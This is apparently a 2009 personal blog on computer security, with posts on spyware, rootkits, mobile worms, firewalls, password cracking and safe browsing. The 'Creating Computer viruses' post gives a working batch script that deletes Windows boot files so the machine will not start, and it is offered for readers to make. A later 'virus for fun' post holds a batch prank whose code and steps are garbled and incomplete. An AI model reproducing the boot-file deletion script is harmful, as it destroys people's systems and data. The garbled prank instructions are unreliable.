Pages

Friday, August 14, 2009


Today we are familiar with the term cyber crimes. Sometime we may be a victim of the cyber crime. Most of the cyber crimes are done through the internet. The increasing number of cyber crime has made it difficult to use the internet even for browsing. Some countries have banned the sites related to pornography. Most of the servers creates the black list which contains the name of the websites that may harm the users if viewed. Now let us look into how to use internet safely.
Install a software firewall in your system. The firewall allows you to know about the applications that access the internet and allows you to block the applications from accessing the internet. See the figure below.


There may be virus or trojan installed in your computer that access the internet without your knowledge. The firewall shows all the applications connected to the internet and allows you to block or terminate the application.

As you know, the world's most safest browser is Mozilla Firefox 3.5. It is very fast also. Hence it is more recommended to use Firefox browser. The fire fox has a add-on named Website Of Trust (WOT) which shows how safe the website we visited is. So I recommend you to install this add-on. The screen shot is given below:



If you are visiting a site related to finance, it would be better if you use private browsing option in fire fox. To enable private browsing go to tools menu -> start private browsing. During private browsing, no data will be stored other than downloaded files and bookmarks.

Try to avoid storing user name and passwords in browser. Also change the password periodically. This will ensure more security to your account. Also don't forget to sign out or log out after viewing the website. Do not click on the links that you are unsure about the content.

Try to avoid visiting porn sites and sites that provides serials or cracks for the sharewares. Download files from the servers you trust. For searching software, it would be better if you search software in filehippo or CNET or other such trusted sites.



Add to Technorati Favorites Bookmark and Share





Monday, July 27, 2009

RootkitRevealer

Now its time to look in to the software section. Let us see about a small software called RootkitReaveler. The software doesn't need to be installed, just double click on the icon and just agree the term and conditions, the software is ready to use. It is designed to run on Windows NT or higher editions of Windows. RootkitRevealer is an advanced rootkit detection utility and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.RootkitRevealer is capable of detecting many persistent rootkits including AFX, Vanquish and HackerDefender. RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys. Since persistent rootkits work by changing API results so that a system view using APIs differs from the actual view in storage, RootkitRevealer compares the results of a system scan at the highest level with that at the lowest level. The highest level is the Windows API and the lowest level is the raw contents of a file system volume or Registry hive. A hive file is the Registry's on-disk storage format. Thus, rootkits, whether user mode or kernel mode, that manipulate the Windows API or native API to remove their presence from a directory listing, for example, will be seen by RootkitRevealer as a discrepancy between the information returned by the Windows API and that seen in the raw scan of a FAT or NTFS volume's file system structures. You can download it from http://filehippo.com/download_rootkit_revealer/tech/



Add to Technorati Favorites Bookmark and Share





Saturday, July 25, 2009

How to create an invisible folder

You may have the private details in your computer and you don't like your friends accessing them. There are software available in the market for protecting your folder by using a password. In such cases you may get troubled if the password is lost. There is also an another way to hide the folders from your friends. This is a common technique used to create an invisible folders.The advantage of this method is that you need no software for that. Follow the steps given below:

1. Select the folder you want to make invisible.

2. Press F2 or right click on the folder and choose rename.

3. Press and hold the alt key and enter 255 using the number pad (press the Num Lock key and enter 255 using the number pad in the Right Hand Side) and then release the alt key.

4. Press enter. Now the folder appears to be a nameless folder.

5. Now what is the next step ? Yes, that's it, making the icon invisible. For that right click on the folder and select the properties.

6. Select the customize tab and click on the change icon button.

7. Now a new window containing several icons appear. Select a invisible icon from the window and then press OK button of the two opened windows. Now the invisible folder is ready.

You can use this to have fun on you friends by hiding the folders in their computers.



Add to Technorati Favorites Bookmark and Share





Friday, July 24, 2009

Google trying to put an end to computer virus....

After the release of the Operating System Google is trying to put an end to the computer virus. The engineering experts is studying the flaws in the existing Operating Systems and the measures to overcome the limitation. If the Google's venture is realized, then it would mark the beginning of a new era in the cyber world. It has been learnt that Linus Upson, Google's Engineering Director, has promised the company is: "Completely redesigning the underlying security architecture of the OS so users don't have to deal with viruses, malware and security updates. It should just work." The dominance of Google among the competitors increases the chance for the success. The Google's policy of the Open Source also add support this argument. But in the history, the release of the Operating System Windows NT threatened several antivirus firms since there was a rumor that all the security flaws of the previous versions of Windows has been solved and no virus can harm the computer running on Windows NT, but the result was against the rumor. There are several challenges before the Google. The web browser Chrome has been reported security flaws and two of them had already solved. We can expect an Operating System free from viruses and malware at free of cost.



Add to Technorati Favorites Bookmark and Share





Wednesday, July 22, 2009

Spyware (Part - 3)

Let us see what are the medium through which a spyware infects computer. A spyware in a computer do not try to infect other computers like virus or worms or trojans. It just collects the user details and send to a particular person or firm via internet. Spywares usually get installed in the computer without the knowledge of the user. The spyware usually comes with a useful software. When the user installs the software without knowing that the software contains spyware, the spyware gets installed in to the computer and sends the details about the user stored in the computer. This is against the privacy in using internet. The manufacturer usually presents the spyware as a useful software. The common categories of the software include themes, games, internet utilities such as download accelerators, web boosters etc. Many Internet users were introduced to spyware in 1999, when a popular freeware game called "Elf Bowling" came bundled with tracking software. The cookie is a well-known mechanism for storing information about an internet user on their own computer. If a website stores information about you in a cookie that you don't know about, the cookie can be considered a form of spyware.
Another way of installing is by using the vulnerabilities in the security software provided to block this spyware. This is by making the user to click on a link that is disguised as a pop up asking any thing that makes the user click on the pop-up. that triggers the installing of the spyware. In a few cases, a worm or virus has delivered a spyware payload. Some attackers used the Spybot worm to install spyware that put pornographic pop-ups on the infected system's screen.By directing traffic to ads set up to channel funds to the spyware authors, they profit personally.



Add to Technorati Favorites Bookmark and Share





Tuesday, July 21, 2009

Creating Computer viruses

In this post I will say how to create some more dangerous application. Activating this will shut down the computer after deleting the files required for booting and not boot during restart. So handle with care otherwise it will end up in the permanent crash. Please do not use this to harm others. I found it from Garena.com.

Open a notepad and type the following and save it as "filename.bat" file.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Add to Technorati Favorites Bookmark and Share





How to make a Virus for fun

While I was searching for latest information about the computer viruses in the internet, I came across a site that tells how to make a simple virus for fun. Its link is: http://ardiansyahputra.wordpress.com/2008/08/23/create-a-harmless-virus-in-notepad-cara-membuat-virus-jinak-di-notepad/

I have put it for you. It can be edited according to your wish. However I didn't edited as it is his work. Please do not use this for any malpractices.

Step 1.
Open a notepad
Step 2.
Type the following codes in the notepad.
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………! properties -> options -> full screen


Step 4 is not necessary. But it will magnify the effect.


Step 5.
Yes, that is the only step remaining -activate it by double clicking on the icon.



To deactivate To Abort virus Click so that your PC is not
shutdown: START – RUN and type command: shutdown -a before remaining time is over.
look at the fig. below


Add to Technorati Favorites Bookmark and Share

Monday, July 20, 2009

Spyware (Part - 2)

Now let us look in to a small history of the Spyware. I have searched several sites for getting the history of Spyware. The Wikipedia provides good and clear information on the history of the Spyware. I have extracted some part of the history of the Spyware here just for you. The first known use of the word Spyware was in October 16, 1995 and it was against Microsoft Business Model. Spyware was first considered as a hardware meant for the espionage purposes. In the early 2000, the founder of the Zone labs, Gregor Freund, used the term spyware during the release of the ZoneAlarm Firewall. Since then the term is used in its present sense. As of 2006, spyware has become one of the prominent security threats to computers using Microsoft Windows operating systems. Computers using Internet Explorer (IE) is the primary browser are particularly vulnerable to such attacks. It not only because IE is the most widely-used browser, but because its tight integration with Windows allows spyware access to crucial parts of the operating system.
Before Internet Explorer 7 was released, the browser would display a message showing that activex must be installed to view a particular section of the website or the whole website. But in most cases the spyware will be in disguised as activex. The combination of user naiveté towards malware and the assumption by Internet Explorer that all ActiveX components are benign, led, in part, to the massive spread of spyware. Many spyware components would also make use of exploits in Javascript, Internet Explorer and Windows to install without user knowledge or permission. After installtion, sometimes windows pop-up warning messages about the presence of the Spyware in the Computer.

The Windows Registry contains multiple sections that by modifying keys values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware typically will link itself from each location in the registry that allows execution. Once running, the spyware will periodically check if any of these links are removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted even if some (or most) of the registry links are removed.



Add to Technorati Favorites Bookmark and Share





How to keep your PC virus free

You may be wondered that is there any way to keep the PC from the virus infection. Here are some tips to keep the PC from the viruses:
For keeping the PC from the computer viruses and other malicious applications we need mainly three softwares:

1. Anti-virus
2. Anti Malware Software
3. Rootkit Remover

Now let us see why we have to use these software. Let us took the case of the anti-virus . As you know anti-virus is used to find and destroy the virus. Knowing this most computer users install anti-virus. But many of the people using the anti-virus are not updating the anti-virus properly. This may put your PC in trouble. The anti-virus has generally two parts: 1. virus signature database and 2. anti-virus engine. Each virus has its own signature as a person has his own signature. The virus signature is nothing but a series of codes that is placed in every file it infect. This code is unique for that particular virus. So by simply comparing the virus signature with the data of a file it is easier to detect the presence of the virus. Since more and more viruses are released in to the cyber space daily, the anti-virus firms discovers the virus signatures of the new virus and put the virus signatures in the internet for the user to download. When we update the anti-virus, these signatures are downloaded in to the database of the anti-virus, and anti-virus gains the capability to detect the new viruses. The anti-virus engine compares the virus signature in the virus signature database with the data of the files. If a match is found, the file will be treated as an infected file and took the measures to prevent further infection and deletion of the virus and the recovery of the original file. It also scans memory for the presence of the virus.

The usage of the anti-virus will not guarantee the protection of the PC from all the malicious software. For that purpose we have to use the anti-malware software. Malware Bytes is one of the most common anti-malware software used internationally. The anti-malware software scan the memory as well as the storage device of the PC for the malicious software. This software can effectively remove almost all the malicious softwares in the PC. But there are some malware application that survive this anti malware software. We can use the rootkit remover software for removing that type of applications. Rootkits are capable of killing and hiding different processes running in the Operating System. Some softwares like demon tools use rootkits, but are not malicious software. Rootkit revealer is a rootkit remover tool used today.
These softwares are not enough to keep your PC from all attacks, if you have an internet connection. You must use a firewall to regulate the internet usage by the applications and to prevent the unwanted packets from entering in to the PC. I prefer Sygate Firewall than the windows firewall since it allows to block the unwanted applications from accessing the internet. But do not use more than one firewall for a PC since the firewalls works on its own set of rules and may clash if more than one firewall is used.
Always use the firefox 3.5 browser for more security. The add-ons must be downloaded if it is marked as recommended. Do not install add-on from the third party whom you do not trust.

Always download the softwares from the trusted sites like filehippo,cnet,brothersoft etc. Try to avoid downloading the softwares from the unfamiliar sites. I believe that these tips will help you to keep your PC clean.




Add to Technorati Favorites Bookmark and Share





Friday, June 26, 2009

Spyware (Part - 1)

A Spyware is any technology or software that gathers personal information of a person or the confidential information of a organization. A Spyware is a malicious application that is installed in the computer with or without the knowledge of the user. The Spyware, as its name suggest perform the function of a spy. It collects several information from the computer and send the information to the attacker. Some spywares allows the user to configure the victim's computer to his needs. The spyeare may be installed in to the computer without the knowledge of the user through the drive by download or by clicking the link on the pop-up window. But there are spywares available in the market which help the parents to track the sites visited by their children. As you may know that the browser stores the information about the sites you visited in the cookies. If the personal information about you are stored in the cookie, then cookie can be considered as a spyware. In the beginning stage the function of the spyware is just monitering the user. But as the time passes, more powerful spyware were introduced. There functions are not just limited to the simple monitering the user. It can not only collect the browsing habts of the user but can also install the software that will interfere with the normal operation of the computer. You may someetimes noticed that you cannot access the internet, but the data transfer occurs between your computer and the internet without your permission. That may be because of the spyware. Some people asks through the sites like yahoo answers, ibibo.com etc about the problem of the spyware redirecting the website. Even if they entered the correct website address, they are redirected to another site. This shows that your browser has compremissed with the spyware installed. As you may know, any personal information that is collected without the knowledge of the user by any means is a crime. Similarly the creaton and uasge of spyware that collects the personal information about the other people or organization is a crime. Many countries have made strict laws to prevent the spyware. Yet there are people creating the spyware, challenging the laws of their own nation.



Add to Technorati Favorites Bookmark and Share





Wednesday, June 24, 2009

Microsoft Malicious Tool For Computer Virus Removal

You may know that Microsoft releases the patches for the new computer viruses and the bugs they found. They also releases some viral removal tools such as Rootkit Revealer for the Windows users. The arrival of these tools as well as the applications for keeping the computer away from the attack of the malicious programs proves their concern about the security of the computers running on Windows. Microsoft is spending splendid resources including time for the Windows Users. They want Windows to be the secure Operating System. You may be noticed that the new Operating Systems that the Microsoft releases are having far good security than its older versions. Some releases even threatened the anti virus software firms. But the virus makers found the loop holes in the security measures and creats the virus that exploits the loop hole to its maximum extend.
There are several softwares available in the Microsoft's website for the computer security. Millions of people have downloaded and installed these softwares. The people who do not download these software may due to the lack of internet connection or due to unawareness or they are using the pirated version of the Windows fearing that they would be caught if they connect to the Microsoft's website. Dont worry about that, you can download it from other trusted websites like Brothersoft, CNET, filehippo etc.
Microsoft has released a malacious removal tool which is a freeware and can be downloaded from the internet. The tool is ment for Windows Vista, XP, 2000, 2003 Windows Server. This Malacious Software Removal Tool can remove any malacious software that is running behind the process tree. For running the application you have to download the application. Then install it in your computer. You can install the application only if you are accessing the computer with your administrator account. After installing the application you can run the software and perform the scan. It will remove all the malacious software running in th process tree. You can use it along with the other anti virus softwares.
The application to be download is 8.4 MB in size. The file name is "windows-kb890830-v2.11.exe". You can download it from:


Add to Technorati Favorites Bookmark and Share





Crazy Boot Computer virus

Crazy Boot is a computer virus that is capable of infecting the computers running on Windows. It spreads through the floppy disks. When a host computer is booted from a floppy disk infected by the Crazy Boot virus, the virus starts infecting the host computer. However it does not cause any physical damage or direct loss of information. It is a boot virus. It infects a computer only when the computer is booted from an infected disk. When a computer is booted from an infected floppy, then Crazy Boot infects the Master Boot Record. It reads the highest memory location from the RAM and reside in the highest memory location. Once it gets in to the memory, it starts infecting files that are not write protected.
Crazy Boot virus is a stealth virus. If you try to examine the infected boot sector, it displays the correct boot sector information. It also displays the message:

DON'T PLAY WITH THE PC!
OTHERWISE YOU WILL GET IN 'DEEP, DEEP' TROUBLE!. . .
CRAZY BOOT VER. 1.0

There is a very low chance for a computer get infected bu the Crazy Boot virus today since the era of floppy disk is almost over and due to the security measures included in the Windows available today in the market. It is very risky to disinfect the boot sector using the FDISK/MBR. It is because Crazy Boot virus will not place the MBR in its correct location. But the location is known to Crazy Boot virus. It is better to use a proper antivirus to remove the virus.


Add to Technorati Favorites Bookmark and Share



Tuesday, June 23, 2009

The Latest Computer-Virus Victim - Macromedia Shockwave

You may be familiar with the .swf files. They are created using the Macromedia Flash. They are used to create animations. I have also created some small flash movies. The swf file contains some audio and video data that deals with the animation. The file is very compact that they can be used in many web based applications. Several websites including those owned by the multinational companies uses flash animations to make their website more attractive and user interactive. One of the example is the esnips.com. the site uses the flash file to allow the user to upload the files. You can also see an attractive animation that involves good user interaction in the website of the company Hero Honda. More over flash allows one to create small applications. The flash gives a lot of functions for the user to create the applications very easily and can accomodate complex functions. The applications created using the flash is more attractive than created using java or cpp. The usage of the flash in the website is considered more secure than including video. But the recent reports by the Kaspersky anti virus firm proves it to be wrong. SWScript.LFM, which is the first malicious program that infects the popular multimedia format, Macromedia Shockwave.For spreading, this malicious program requires several important conditions, whose simultaneous execution is highly unlikely. First of all, LFM requires a PC that has been installed with a full program version that executes Macromedia Shockwave files - special plug-in versions installed on Internet Explorer and Netscape Navigator by default are not enough for the virus to operate. Secondly, a user has to manually download the infected SMF file to his computer and start it up. Thirdly, fortunately LFM is only capable of infecting SMF files located in the same directory as the file-carrying virus. Kaspersky Labs considers the possibility of an epidemic outbreak caused by the LFM virus to be very unlikely. May be this starts the new era in the computer virus which can spread more than other virus since many websites uses flash based applications.
Defense procedures against LFM have already been added to the Kaspersky Labs daily anti-virus database update as of January 8, 2002. You will get a more detailed information about this malicious program is available in the Kaspersky Virus Encyclopedia.
Blogged with the Flock Browser

Sunday, June 21, 2009

Commwarrior Mobile Virus

Commwarrior is a mobile worm developed to infect the mobiles running on the Symbian OS. It was first discovered in Russia. It uses Bluetooth and MMS as the medium for spreading. Commwarrior.A checks the system cloack and decides which application can be used for the spreading. But Commwarrior does not use this method. The worm reads the mobile numbers from the address book of the infected mobile and sends out the virus files via Bluetooth and through MMS. Normally if a virus starts spreading, the users can be warned against the virus if the name if the infected file that the virus will sent to the other mobiles. The Commwarrior cannot be prevented by this manner. It can name the infected files with different names as the parent names his child. Since the different infected files have different names, the users cannot be warned aginst receiving the infected file. Usually the multimedia files are send through the MMS. So the users have the feeling that the files received through the MMS are more secure since the images and video have a minor probability to be a virus. But unfortunately the Symbian installation files can be sent through the MMS. This feature (may be loop hole) is used by the worm for infecting the other mobiles. So be carefull about the files you received in the mobiles. Always check whether the file is sent with the knowledge of the person from whose mobile you received the file.

Spreading through Bluetooth

Commwarrior spreads through bluetooth using the SIS files that have different names. The SIS file contains the worm main executable commwarrior.exe and boot component commrec.mdl. The SIS file contains autostart settings that will automatically execute commwarrior.exe after the SIS file is being installed.
When Commwarrior worm is executed it will start looking for other bluetooth enabled devices. If a device is found, it send a copy of itself to each of these phones one after another. If target phone goes out of range or rejects file transfer, the Commwarrior will search for another phone. The Commwarrior worm will look for new targets after sending itself to the first target, thus it is able to contact all phones in range.
Replication over MMS

Spreading though MMS:

Commwarrior spreads through the MMS by sending MMS messages that contains the infected SIS file to other users whose mobile numbers were in the address book of the infected mobile. The MMS messages contain variable text messages and Commwarrior SIS file with filename commw.sis. Unlike in bluetooth spreading, the SIS file name is constant, otherwise the SIS file is identical to the one sent in bluetooth spreading.




Disinfection:
             The easiest way for disinfection is the use of the anti virus software for the mobile phone and it will remove almost all the viruses in your mobile phones. Several companies like F-Secure are providing softwares for the removal of the mobile phone viruses. For downloading the software, open the browser in your mobile and navigate to : http://mobile.f-secure.com. Click on the link "Download F-Secure Mobile Anti-Virus" and then select your phone model. Then download the file and then install it. After installing go to the menu and open the antivirus and scan the mobile phone for virus. The software will detect the viruses and removes it. But to kill the running Commwarrior process, the mobile phone must be restarted. You will get a detailed description about the manual removal from:
http://www.cell-phone-viruses.com/1124211683-commwarrior-virus-manual-removal.html
Blogged with the Flock Browser

Friday, June 19, 2009

Duts Mobile Virus

After the invasion of the Cabir, a new mobile virus called WinCE/Duts was discovered in July 2004. One of the interesting characteristics of the virus is that it first asks the user for permission to infect the files. When an infected file is executed, the virus pops up a message box asking:
Dear User, am I allowed to spread?
When the user press "Yes", the virus will infect all the EXE files in the current directory. Duts contains two messages that are not displayed:
This is proof of concept code. Also, i wanted to make avers happy.
The situation when Pocket PC antiviruses detect only EICAR file had to end ...
Duts is a 1520 bytes long program written in the assembly language for the ARM processor. It affects the devices running on the Windows CE Operating System.
Blogged with the Flock Browser

Wednesday, June 17, 2009

Skulls Mobile Virus

I have given a brief idea about the viruses affecting the mobile phones. Skulls is one of the notorious trojan that affect the mobile phones. Skulls is a SIS file trojan that affects the phones running on Symbian OS. The virus replaces the applications installed in the phone with the non-functional versions so that the phone became almost useless.
Most people wanted to make the user interface of the mobile phones more attractive. For this purpose they install themes. Sometimes the installed theme file may be "Extended theme.SIS" which informs you that it is the theme manager for Nokia 7610 smart phone. Then beware-you may have installed Skulls virus. After the Skulls get the control of your mobile, you will see all the icons of the applications in the menu will be replaced by the image of skulls. I have provided a screenshot below:

Fortunately Skulls allows to make and receive calls. But all other application including SMS and MMS will be disabled by Skulls. If you find that your phone contains Skull virus it is more important that you should not reboot your phone. Rebooting the phone will make it difficult for removing the Skull virus.Skulls trojans are targeted against Symbian Series 60 devices, but it can also affect other Symbian devices, for example Nokia 9500, which is a Series 80 device. However when trying to install Skulls trojan on Nokia 9500, user will get a warning that the SIS file is not intended for the device, so risk of accidental infection is low.
For manual removal of Skulls from a compromised device, it is necessary to reinstall all overwritten applications. The SymbOS/Skulls SIS installer must then be deleted. If this does not restore the phone, a formatting the phone may be necessary. All data saved in the C drive will be lost during a format.

Mobile Viruses

The mobile phones have become a part of our life. Now it is hard to image a day without mobile phones. As the technology advanced, the mobile phones became more and more sophisticated and became more user friendly and includes lots of functions. mobile phones keep as always connected to our dear ones. Even the mobile phones creates small radiation problems, people ignores it and becomes victim of the harmful diseases. But the number of peoples using the mobile phones is increasing day by day. This put the mobile phone manufactures in tough competition. So the manufactures develop new variety of phones. Thus today's mobiles phones can be called as a mobile computer since it corporate almost all the functions of the personal computer. Most of the costly mobile phones are using advanced Operating Systems like Symbian OS, etc. They allows the user to even connect to the internet. The growth of the mobile phone technology in the constructive side gives birth to its destructive side also. Thus the viruses for the mobile phones and PDA took birth. Fortunately the mobile phones which run on Operating Systems that is made entirely for that specific series of mobile phones are almost safe from the virus attack. But the blue tooth enbled mobiles are becoming the victim of virus attack.
 A mobile virus is a electronic virus that infects mobile phones or the wireless enabled PDAs. The first case of a mobile virus was reported in June 2004 when it was discovered that a company called Ojam had engineered an anti-piracy Trojan virus in older versions of their mobile phone game Mosquito. This virus sent SMS text messages to the company without the user's knowledge. This virus was removed from more recent versions of the game; however it still exists on older, unlicensed versions. These older versions may still be distributed on file-sharing networks and free software download web sites.
In July 2004, computer hobbyists released a proof-of-concept mobile virus named Cabir. Cabir is also known as EPOC.cabir and Symbian/Cabir that is designed to infect mobile phones running Symbian OS. When a phone is infected with Cabir, the message "Caribe" is displayed on the phone's display, and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals. The worm was not sent out into the wild, but sent directly to anti-virus firms, who believe Cabir in its current state is harmless. However, it does prove that mobile phones are also at risk from virus writers. Experts also believe that the worm was developed by a group who call themselves 29A, a group of international hackers, as a "proof of concept" worm in order to catch world attention. It failed to infect any of its targets. The worm can attack and replicate on Bluetooth enabled Series 60 phones. The worm tries to send itself to all Bluetooth enabled devices that support the "Object Push Profile", which can also be non-Symbian phones, desktop computers or even printers. Symantec reports that the worm spreads as a .SIS file installed in the Apps directory. Unlike actual PC worms, Cabir does not spread if the user does not accept the file-transfer or does not agree with the installation. F-Secure reports that some phones, at least, warn the user about an unverified supplier.[1] So, like many other worms, this sample also needs a good portion of social engineering to reach its goal. While the worm is considered harmless because it replicates but does not perform any other activity, it will result in shortened battery life on portable devices due to constant scanning for other Bluetooth enabled devices. Mabir, a variant of Cabir, is capable of spreading not only via Bluetooth but also via MMS. By sending out copies of itself as a .sis file over cellular networks, it can affect even users who are outside the 10m range of Bluetooth.
 In March 2005 it was reported that a computer worm called Commwarrior-A has been infecting Symbian series 60 mobile phones. This worm replicates itself through the phone's Multimedia Messaging System (MMS). It sends copies of itself to other phone owners listed in the phone user's address book. Although the worm is not considered harmful, experts agree that it heralds a new age of electronic attacks on mobile phones.
The other known mobile viruses are: Duts, Skulls, Commwarrior, etc. The details of these viruses will be published later.
Blogged with the Flock Browser

Friday, June 12, 2009

Actifed Computer Virus

Actifed virus is a type of G2 generated encrypted computer virus. As normally the virus is loaded in to the memory by executing an infected program and then it affects the runtime programs and then corrupts the program files.This virus affects the .COM and .EXE file but does not affect the command.com. G2 generates compact, easily modified, fully commented, source code of .COM and .EXE infectors. It also supports the creation of resident and non-resident encrypted and non-encrypted viruses. The PS-MPC has similar use.

Blogged with the Flock Browser

Monday, June 1, 2009

Computer Virus Sinowal

Kaspersky reports that the virusthreat has increased during the month of April 2009. The new malwares exploit the security flaws in Adobe Acrobat Reader of the pdf software or the Neosploit rootkit. According to the researchers the detection and the cure of the rootkits is a very difficult problem faced by the antivirus experts.
Kaspersky Research Lab has detected a fresh version of the Sinowal at the end of March 2009. Sinowal is a vicious code that remains itself hidden in an infected computer by infecting its Master Boot Record (MBR). Sinowal plants itself in the lowest level of the Operating System. It infects the MBR and bypasses the antivirus software. The e-mails were considered as the main medium for the spreading of the malwares through the internet. But the infection through the website has increased 300% by the year 2008. Now the malwares redirect the search results and confuses the user. Kaspersky recomends its users to make their antivirus up-to-date and scan for the malware. If any malware is found, system will have to be restarted while undergoing treatment.
Blogged with the Flock Browser

Saturday, May 30, 2009

Software Firewall

You may have heard the term firewall. If you have a network of computers (say 50 computers in the network) you will implement a firewall to protect your network from the cyber attacks. A firewall controls the ports that are used to communicate with the network. You can implement your own laws concerning the security of the network. You can allow the FTP to restricted number of computers. You can also regulate the computer from visiting certain restricted sites. If the network is large the security must be as tight. But what about the case of one or two computers connected to the internet ? The software firewall is the solution. Te software firewall examines the ports connected to the internet and regulates it. It also asks the user whenever an applicayion installed in the computer try to access the internet. Thus we can prevent unwanted usage of the internet by the unknown application. This also saves our band width. The usage of internet connection by the unknown application is generally a trojan or spyware.
The usage of the software firewall is not limited to the small network. It is also used in the huge network to regulate the usage of the internet by the employees.

The firewall uses the following ways to prevent the unwanted data transfer through the internet.
  • Proxy Service: The information received from the internet is received and it is forwarded to the requesting system. It can also receive the information (request) sent by a computer in the network and forward it to the corresponding destination.
  • Packet Filtereing: The information to be sent are breakdown into small units and are converted to packets. These packets are first received by the firewall and checks it with a set of predefined filters. The firewall allows only the trusted packets to pass to the requesting computer.
  • Stateful Inspection: It is a newer method. It does not checks the whole packet. Instaed it checks for only certain parts of the packet. It checks specific part of the data while sending the request and compares it with the incomming packets. If a match is found the packet is considered as a trusted packet and allowed to pass through the network otherwise it is blocked.
Blogged with the Flock Browser

Sunday, May 24, 2009

Computer virus strikes US Marshals, FBI affected

A mystery computer virus affected the computer networks of the US Marshals and FBI. Both of them had shut down their network to prevent further spreading and destruction. The computer network have been disconnected from the Justice Department as a preventive measure. The problem of virus starts in the Thursday. The origin of the virus has not been identified. Besides the external network, the law enforcement department has its own internal network to prevent the snoopers from accessing the sensitive data. The internet access and e-mail services of the US Marshals and FBI had been disabled while the staff worked on the problem.

Thursday, May 21, 2009

Resident Virus

As you know a virus will normally infect an executable file and it will be executed when the infected file is executed. According to the mode of infection the viruses are divided into resident and non-resident viruses. The non resident virus has a module to find the files that it can infect and it also has another module called replication module which will infect the file encountered by the finding module. After infecting a particular file the virus will be executed when the infected file is executed.
In the case of the resident virus, the thing is different. They first infect a file or executed by some other means. When they are executed it loads its replication module into the memory. By working in the memory it is capable of infecting the files to a great extend. So there are two types of resident viruses- those which are capable of infecting large number of files in a short duration called fast infectors and the other that infects less number of files. The fast infecting type virus is somewhat more dangerous since it infect more potential programs in a short duration. If the infected potential files include the files of the antivirus then there is a chance of infecting the files scanned by the antivirus. The fast infecting virus shows the symptoms of infection very soon, mostly by slowing down the PC. There are antiviruses that will be active when there is an abnormality is identified and it will disinfect the infected file. In the case of slow infectors, they do not show the symptoms of infection as slowing downing the PC. This makes them less chance to be identified by the antivirus. But do not remain unidentified forever. Since it shows the signs of infection very late, they are identified very late. However it is less dangerous than that of the fast infectors.

Sunday, May 17, 2009

Crimeware

Crimewares are applications that are developed to steal the personal information or to commit a crime. Usually crimeware are used to steal money from the accounts of the companies or the traders that makes the thief richer. Crimeware uses several methods. The attacker can use a keylogger trojan fro stealing the kestrokes from the user. The user may be an employ of a bank or other finantial institution. The attacker can use this stealed information for his job. Another method is by redirecting the user to a fake website even if the user has entered the url correctly. the crimeware allows the attacker to wait till the user login in to his account and the he can steal the information without identified by the user. The crimeware can steal password from the cache of the browser. The crimeware uses the vulnerabilities in the applications that uses internet connection. The attack may also in the form of an e-mail which provides fake sender details.

Saturday, May 16, 2009

Password Cracking

Password cracking is the process of recovering the password. Usually password cracking is used to find out the password lost by the user. Like every development in the technology, this is also used for illegal purposes. Password cracking is used for hacking purposes. Password cracking is used for determining the active passwords of the email by the attackers. The password they crack include passwords of the website, computer, domains etc.
In most of the networks authentication is used to allow the limited access to the network. The authentication is generally done by using the user name and password. Without the user name or password a computer is not allowed to access the network. In most cases the password is not stored in the plain text form. The password in the plain text form is more vulnerable to attack. For the security reasons the password is encrypted. Encryption is done in different method is the password is mixed with certain data and the resultant form is stored in the corresponding database. If an attacker gets this encrypted password it will be easier for him to find out the original password.
One of the method of password cracking is by guessing. If the attacker knows a user he guesses the password by simply checks the password by giving the names of the friend, pet,favorite celebrities etc. The other type of guessing involves the trial and error method using the common password words like admin,administrator, password, passcard etc.
Another type of finding password is by using a software which generates the password like words from the dictionary. A good percentage of the people creates password from the words in the dictionary. Some people may prefix or postfix a digit which is usually 1.
The another type of attack is the brute force attack. This has higher chance of success if the password is small. That is why the most of the sites requiring authentication asks for password with more than 6 characters. The brute force attack uses every words that may have the chance for becoming the password.
Precomputation is another method of finding password. This method involves hashing of each word in the dictionary and stores it. This way when a new encrypted password is obtained password recovery is very easy.
The password cracking can be prevented by using the high encryption during the transmission. In the case of password stored in the system, the password must be accessible only to the trusted applications.

Thursday, May 14, 2009

Know your Computer's internet security

You may know that a computer can communicate with other computer only through the ports. A computer can be connected to the internet only through the ports. A computer has thousands of ports. But we require only a fewer ports. If a remote computer needs a port, it sends request to the computer for accessing a particular port. Each port is identified by its port number. The computer receives the request and allows the program in the remote computer to access the computer. This is the normal case. I mean the ideal case. But the programs in the remote computer are human created and so there is a chance for the presence of the error. Moreover some programs are malware that uses the trusted programs to get in to the computer. By closing the unnecessary ports we can prevent the remote computer from accessing our computer up to a limit. But this will not protect your computer completely from the attacks through the internet. This only reduces the chance of attack through the internet connection. For knowing which ports are opened and which are closed visit: http://scan.sygate.com/
If you use a firewall software you can manage the programs from accessing the internet. You can block the unwanted programs from accessing the internet. But the presence of rootkits can even cheat the firewall

Want to know about Rootkits ?

You may noticed that while you perform scan for the virus with an anti virus software, it may sometimes display Rootkits found. Want to know about the Rootkits? Here is a small description about the Rootkits. Rootkit is a software which is a program or a combination of more programs that are designed to hide the fact that a system has been compromised. The rootkits are to be installed by the attacker in the target machine phisically by himself or by exploiting the system vulnerabilities. Once the rootkit is installed in the target system, the attacker can modify the system files and hide the running process of the attacker installed files. The rootkits often forms a back door in the system allowing the attacker to steal the data from the system without knowing the user.
Actually Rootkits are evolved as a software to handle the system when the system falls in to a non-responsive state. Later the hackers have turned this to a malware. The applications which creates the virtual devices like Demon Tools uses the Rootkits to hide certain system activity and to supress certain process of the system. The Kaspersky antivirus uses the rootkits to hide and protect their files from the attack of the malwares.
